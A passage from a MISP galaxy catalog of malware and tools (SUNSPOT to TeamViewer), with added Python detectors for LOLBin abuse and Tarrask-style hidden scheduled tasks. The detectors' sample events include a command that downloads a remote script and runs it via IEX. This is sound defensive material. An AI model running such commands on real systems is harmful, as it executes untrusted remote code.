in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0559 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SUNSPOT
SUNSPOT is an implant that injected the SUNBURST backdoor into the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[CrowdStrike SUNSPOT Implant January 2021]
Internal MISP references
UUID 66966a12-3db3-4e43-a7e8-6c6836ccd8fe
which can be used as unique global reference for SUNSPOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0562 |
source | MITRE |
tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SUPERNOVA
SUPERNOVA is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of APT29's SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests SUPERNOVA may have been used by the China-based threat group SPIRAL.[Guidepoint SUPERNOVA Dec 2020][Unit42 SUPERNOVA Dec 2020][SolarWinds Advisory Dec 2020][CISA Supernova Jan 2021][Microsoft Analyzing Solorigate Dec 2020]
Internal MISP references
UUID f02abaee-237b-4891-bb5d-30ca86dfc2c8
which can be used as unique global reference for SUPERNOVA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0578 |
source | MITRE |
type | ['malware'] |
SVCReady
SVCReady is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between TA551 activity and SVCReady distribution, including similarities in file names, lure images, and identical grammatical errors.[HP SVCReady Jun 2022]
Internal MISP references
UUID a8110f81-5ee9-5819-91ce-3a57aa330dcb
which can be used as unique global reference for SVCReady
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1064 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Sykipot
Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims. [Alienvault Sykipot DOD Smart Cards] The group using this malware has also been referred to as Sykipot. [Blasco 2013]
Internal MISP references
UUID ae749f9c-cf46-42ce-b0b8-f0be8660e3f3
which can be used as unique global reference for Sykipot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0018 |
source | MITRE |
type | ['malware'] |
SynAck
SynAck is a variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. [SecureList SynAck Doppelgänging May 2018] [Kaspersky Lab SynAck May 2018]
Internal MISP references
UUID 19ae8345-745e-4872-8a29-d56c8800d626
which can be used as unique global reference for SynAck
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0242 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Syncappvpublishingserver - Duplicate
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script related to App-V and its publishing server
Author: Oddvar Moe
Paths: * C:\Windows\System32\SyncAppvPublishingServer.vbs
Resources: * https://twitter.com/monoxgas/status/895045566090010624 * https://twitter.com/subTee/status/855738126882316288
Detection: * Sigma: proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml[Syncappvpublishingserver.vbs - LOLBAS Project]
Internal MISP references
UUID 6af0eac2-c35f-4569-ae09-47f1ca846961
which can be used as unique global reference for Syncappvpublishingserver - Duplicate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5261 |
source | Tidal Cyber |
tags | ['9e504206-7a84-40a5-b896-8995d82e3586', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SyncAppvPublishingServer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by App-v to get App-v server lists
Author: Oddvar Moe
Paths: * C:\Windows\System32\SyncAppvPublishingServer.exe * C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Resources: * https://twitter.com/monoxgas/status/895045566090010624
Detection: * Sigma: posh_ps_syncappvpublishingserver_exe.yml * Sigma: posh_pm_syncappvpublishingserver_exe.yml * Sigma: proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml * IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed[SyncAppvPublishingServer.exe - LOLBAS Project]
Internal MISP references
UUID f2928533-34e1-4599-a3ec-c8b4ef9d81b4
which can be used as unique global reference for SyncAppvPublishingServer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5166 |
source | Tidal Cyber |
tags | ['acda137a-d1c9-4216-9c08-d07c8d899725', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SYNful Knock
SYNful Knock is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.[Mandiant - Synful Knock][Cisco Synful Knock Evolution]
Internal MISP references
UUID 69ab291d-5066-4e47-9862-1f5c7bac7200
which can be used as unique global reference for SYNful Knock
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S0519 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852'] |
type | ['malware'] |
Sys10
Sys10 is a backdoor that was used throughout 2013 by Naikon. [Baumgartner Naikon 2015]
Internal MISP references
UUID 2df35a92-2295-417a-af5a-ba5c943ef40d
which can be used as unique global reference for Sys10
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0060 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SYSCON
SYSCON is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. SYSCON has been delivered by the CARROTBALL and CARROTBAT droppers.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID ea556a8d-4959-423f-a2dd-622d0497d484
which can be used as unique global reference for SYSCON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0464 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Syssetup
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows NT System Setup
Author: LOLBAS Team
Paths: * c:\windows\system32\syssetup.dll * c:\windows\syswow64\syssetup.dll
Resources: * https://twitter.com/pabraeken/status/994392481927258113 * https://twitter.com/harr0ey/status/975350238184697857 * https://twitter.com/bohops/status/975549525938135040 * https://windows10dll.nirsoft.net/syssetup_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___syssetup.yml[Syssetup.dll - LOLBAS Project]
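The three LOLBAS entries above (Stordiag, SyncAppvPublishingServer in its .exe and .vbs forms, and Syssetup) each reduce to a rule over process-creation telemetry: a helper binary running from the wrong directory, a script host argument that carries an extra PowerShell statement, and rundll32.exe loading syssetup.dll. The following is an added example, not code from the LOLBAS project or Tidal Cyber, that encodes those detection hints as rules over constructed events. Field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample events, the rundll32 export placeholder and the severity labels are assumptions made for illustration.

```python
"""Added example (not LOLBAS or Tidal Cyber code): process-creation rules for the
Stordiag, SyncAppvPublishingServer and Syssetup entries. Sample events below are
constructed, not real telemetry."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
STORDIAG_CHILDREN = {"systeminfo.exe", "fltmc.exe", "schtasks.exe"}
# A ';' followed by more text inside the SyncAppvPublishingServer argument ends the
# legitimate Sync-AppvPublishingServer call and starts attacker-supplied PowerShell.
_INJECTED_STATEMENT = re.compile(r";\s*\S")


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the process that created it
    command_line: str


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _dir(path: str) -> str:
    return ntpath.normpath(ntpath.dirname(path)).lower()


Hit = Tuple[str, str]  # (severity, reason)


def rule_stordiag(ev: ProcEvent) -> Optional[Hit]:
    # stordiag.exe runs these helpers by bare name, so a copy planted where the
    # search order finds it first is executed instead of the System32 binary.
    # LOLBAS IOC: any of the three running outside the two system directories.
    if _base(ev.image) in STORDIAG_CHILDREN and _dir(ev.image) not in SYSTEM_DIRS:
        sev = "high" if _base(ev.parent_image) == "stordiag.exe" else "medium"
        return sev, f"{_base(ev.image)} executed from {_dir(ev.image)}"
    return None


def rule_syncappv(ev: ProcEvent) -> Optional[Hit]:
    img = _base(ev.image)
    cl = ev.command_line.lower()
    runs_vbs = img in {"wscript.exe", "cscript.exe"} and "syncappvpublishingserver.vbs" in cl
    if img == "syncappvpublishingserver.exe" or runs_vbs:
        # Any use is suspicious where App-V is not deployed; an injected statement is worse.
        if _INJECTED_STATEMENT.search(ev.command_line):
            return "high", "SyncAppvPublishingServer argument carries an extra statement"
        return "low", "SyncAppvPublishingServer invoked"
    if img == "powershell.exe" and _base(ev.parent_image) == "syncappvpublishingserver.exe":
        return "high", "PowerShell spawned by SyncAppvPublishingServer.exe"
    return None


def rule_syssetup(ev: ProcEvent) -> Optional[Hit]:
    if _base(ev.image) == "rundll32.exe" and "syssetup.dll" in ev.command_line.lower():
        return "medium", "rundll32.exe loading syssetup.dll"
    return None


RULES = (rule_stordiag, rule_syncappv, rule_syssetup)


def evaluate(events) -> List[Tuple[str, str, str]]:
    """Return (rule name, severity, reason) for every event a rule matches."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append((rule.__name__, hit[0], hit[1]))
    return hits


# Constructed sample: one benign event, then one instance of each abuse.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\systeminfo.exe", r"C:\Windows\System32\cmd.exe", "systeminfo"),
    ProcEvent(r"C:\Users\Public\tools\schtasks.exe", r"C:\Windows\System32\stordiag.exe", "schtasks.exe"),
    ProcEvent(r"C:\Windows\System32\SyncAppvPublishingServer.exe", r"C:\Windows\System32\cmd.exe",
              'SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\') | IEX"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\SyncAppvPublishingServer.exe",
              "powershell.exe -NonInteractive -WindowStyle Hidden -Command ..."),
    # <export> is a placeholder; the real export name is not part of this example.
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
              r"rundll32.exe syssetup.dll,<export> C:\Users\Public\payload.inf"),
]


def demo_process_rules() -> List[Tuple[str, str, str]]:
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for name, sev, reason in demo_process_rules():
        print(f"[{sev}] {name}: {reason}")
```

The directory comparison is the part worth getting right: normalise with ntpath and compare against both System32 and SysWOW64, or a legitimate 32-bit systeminfo.exe will page someone. The low-severity SyncAppvPublishingServer hit is deliberate: per the LOLBAS IOC the binary should not be running at all unless App-V is deployed, so an environment without App-V can raise that to high.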
Internal MISP references
UUID 5d220e4f-db5f-4523-8dc5-63a604f3964b
which can be used as unique global reference for Syssetup
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5199 |
source | Tidal Cyber |
tags | ['9105775d-bdcb-45cc-895d-6c7bbb3d30ce', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SystemBC
SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence and lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.[BlackBerry SystemBC June 10 2021][Sophos SystemBC December 16 2020][WithSecure SystemBC May 10 2021][Trend Micro Play Ransomware September 06 2022] According to Mandiant's 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.[TechRepublic M-Trends 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/systembc/
PulseDive (IOCs): https://pulsedive.com/threat/SystemBC
Internal MISP references
UUID c30929fb-28a1-407c-a1c3-a83374c63267
which can be used as unique global reference for SystemBC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5058 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Systeminfo
Systeminfo is a Windows utility that can be used to gather detailed information about a computer. [TechNet Systeminfo]
Internal MISP references
UUID cecea681-a753-47b5-9d77-c10a5b4403ab
which can be used as unique global reference for Systeminfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0096 |
source | MITRE |
tags | ['7b918200-2c8d-4b86-a81b-b2bdec5b2c2b', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SysUpdate
SysUpdate is a backdoor written in C++ that has been used by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]
Internal MISP references
UUID 148d587c-3b1e-4e71-bdfb-8c37005e7e77
which can be used as unique global reference for SysUpdate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0663 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
T9000
T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. [FireEye admin@338 March 2014] [Palo Alto T9000 Feb 2016]
Internal MISP references
UUID c5647cc4-0d46-4a41-8591-9179737747a2
which can be used as unique global reference for T9000
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0098 |
source | MITRE |
type | ['malware'] |
Tactical RMM
According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID ba4777f9-bb3b-4143-8062-a510c30544ce
which can be used as unique global reference for Tactical RMM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5066 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Taidoor
Taidoor is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.[CISA MAR-10292089-1.v2 TAIDOOR August 2021] Taidoor has primarily been used against Taiwanese government organizations since at least 2010.[TrendMicro Taidoor]
Internal MISP references
UUID 9334df79-9023-44bb-bc28-16c1f07b836b
which can be used as unique global reference for Taidoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0011 |
source | MITRE |
type | ['malware'] |
Tailscale
According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that "provides virtual private networks (VPNs) to secure network communications". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID 130a5491-1b93-45fd-bd72-9e5f8ddeba2a
which can be used as unique global reference for Tailscale
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5069 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TAINTEDSCRIBE
TAINTEDSCRIBE is a fully-featured beaconing implant integrated with command modules used by Lazarus Group. It was first reported in May 2020.[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020]
Internal MISP references
UUID 1548c94a-fb4d-43d8-9956-ea26f5cc552f
which can be used as unique global reference for TAINTEDSCRIBE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0586 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TajMahal
TajMahal is a multifunctional spying framework that has been in use since at least 2014. TajMahal is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.[Kaspersky TajMahal April 2019]
Internal MISP references
UUID b1b7a8d9-6df3-4e89-8622-a6eea3da729b
which can be used as unique global reference for TajMahal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0467 |
source | MITRE |
type | ['malware'] |
Tar
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to extract and create archives.
Author: Brian Lucero
Paths: * C:\Windows\System32\tar.exe
Resources: * https://twitter.com/Cyber_Sorcery/status/1619819249886969856
Detection: * IOC: tar.exe extracting files from a remote host within the environment[Tar.exe - LOLBAS Project]
Internal MISP references
UUID 65e149a8-7c78-40d0-9cc5-9f420011facc
which can be used as unique global reference for Tar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5167 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Tarrask
Tarrask is malware that has been used by HAFNIUM since at least August 2021. Tarrask was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.[Tarrask scheduled task]
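The concealment Tarrask is known for (per Microsoft's public write-up, which the cited reference summarises) is removing the SD value, the security descriptor, from a task's node under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree; the task keeps running but no longer appears in schtasks /query or the Task Scheduler UI. The following is an added example, not Tidal Cyber's or Microsoft's code, that parses a .reg export of that key and reports task nodes that have an Id value but no SD value. The sample export is constructed; the task name WinUpdateCheck and the GUIDs are placeholders.

```python
"""Added example (not Tidal Cyber or Microsoft code): flag scheduled tasks whose
registry node lacks an SD (security descriptor) value, the concealment Tarrask
relies on. Input is a .reg export of the TaskCache\Tree key; SAMPLE_REG is constructed."""
import re
from typing import Dict, List, Set

TREE_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree"
_KEY_LINE = re.compile(r"^\[(.+)\]$")
_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=')


def parse_reg_export(text: str) -> Dict[str, Set[str]]:
    """Map each key path in a .reg export to the set of value names it holds.
    Continuation lines of multi-line hex values and '@=' defaults are skipped."""
    keys: Dict[str, Set[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        key = _KEY_LINE.match(line)
        if key:
            current = key.group(1)
            keys[current] = set()
            continue
        value = _VALUE_LINE.match(line)
        if value and current is not None:
            keys[current].add(value.group(1))
    return keys


def find_hidden_tasks(keys: Dict[str, Set[str]]) -> List[str]:
    """A task node under Tree carries an Id value (folder nodes do not). A task
    node with Id but no SD is invisible to schtasks /query yet still scheduled."""
    prefix = TREE_KEY.lower() + "\\"
    hidden = []
    for path, names in keys.items():
        if path.lower().startswith(prefix) and "Id" in names and "SD" not in names:
            hidden.append(path[len(prefix):])
    return hidden


# Constructed export: folder nodes, one normal task with its SD, one task whose SD was removed.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Defrag]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Defrag\ScheduledDefrag]
"Id"="{11111111-2222-3333-4444-555555555555}"
"Index"=dword:00000003
"SD"=hex:01,00,04,80,14,00,00,00,20,00,00,00,00,00,00,00,2c,00,00,00,01,02,00,\
  00,00,00,00,05,20,00,00,00,20,02,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinUpdateCheck]
"Id"="{66666666-7777-8888-9999-000000000000}"
"Index"=dword:00000003
"""


def demo_hidden_tasks() -> List[str]:
    return find_hidden_tasks(parse_reg_export(SAMPLE_REG))


if __name__ == "__main__":
    # On a live host, produce the input with:
    #   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree" tree.reg
    # and read it with open("tree.reg", encoding="utf-16"), since reg.exe writes UTF-16LE with a BOM.
    print(demo_hidden_tasks())
```

Run it against an export taken with the SYSTEM account or an elevated prompt, since the Tree key is not fully readable otherwise. A hit is worth correlating with the matching Tasks\{GUID} node (the Id value) and with 4698 task-creation events, because a task whose SD was deleted does not show up in the usual schtasks /query inventory.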
Internal MISP references
UUID 7bb9d181-4405-4938-bafb-b13cc98b6cd8
which can be used as unique global reference for Tarrask
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1011 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Tasklist
The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. [Microsoft Tasklist]
Internal MISP references
UUID abae8f19-9497-4a71-82b6-ae6edd26ad98
which can be used as unique global reference for Tasklist
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0057 |
source | MITRE |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
tcpdump
tcpdump is an open-source network packet analyzer utility run from the command line.
Internal MISP references
UUID 7a5d457c-949c-4e8f-817a-7e2d33f6c618
which can be used as unique global reference for tcpdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5267 |
source | Tidal Cyber |
tags | ['02495172-1563-48e7-8ac2-98463bd85e9d', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
TDSSKiller
TDSSKiller is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID c62b061a-b4d0-4b28-932c-3c9423443248
which can be used as unique global reference for TDSSKiller
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5044 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TDTESS
TDTESS is a 64-bit .NET binary backdoor used by CopyKittens. [ClearSky Wilted Tulip July 2017]
Internal MISP references
UUID e7116740-fe7c-45e2-b98d-0c594a7dff2f
which can be used as unique global reference for TDTESS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0164 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
te
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
Detection: * Sigma: proc_creation_win_susp_use_of_te_bin.yml[te.exe - LOLBAS Project]
Internal MISP references
UUID 8eef4e4b-e294-47bb-befa-9cd97ceced57
which can be used as unique global reference for te
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5239 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Teams
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Electron runtime binary which runs the Teams application
Author: Andrew Kisliakov
Paths: * %LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe
Resources: * https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/
Detection: * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app directory created * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app.asar file created/modified by non-Teams installer/updater * Sigma: proc_creation_win_susp_electron_exeuction_proxy.yml[Teams.exe - LOLBAS Project]
Internal MISP references
UUID 13221a7b-6c23-48a7-97bd-21e2c689a391
which can be used as unique global reference for Teams
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5240 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TeamViewer
TeamViewer is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 6b5f6eb4-4cdd-4383-8623-d1f7de486865
which can be used as unique global reference for TeamViewer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5010 |
source | Tidal Cyber |
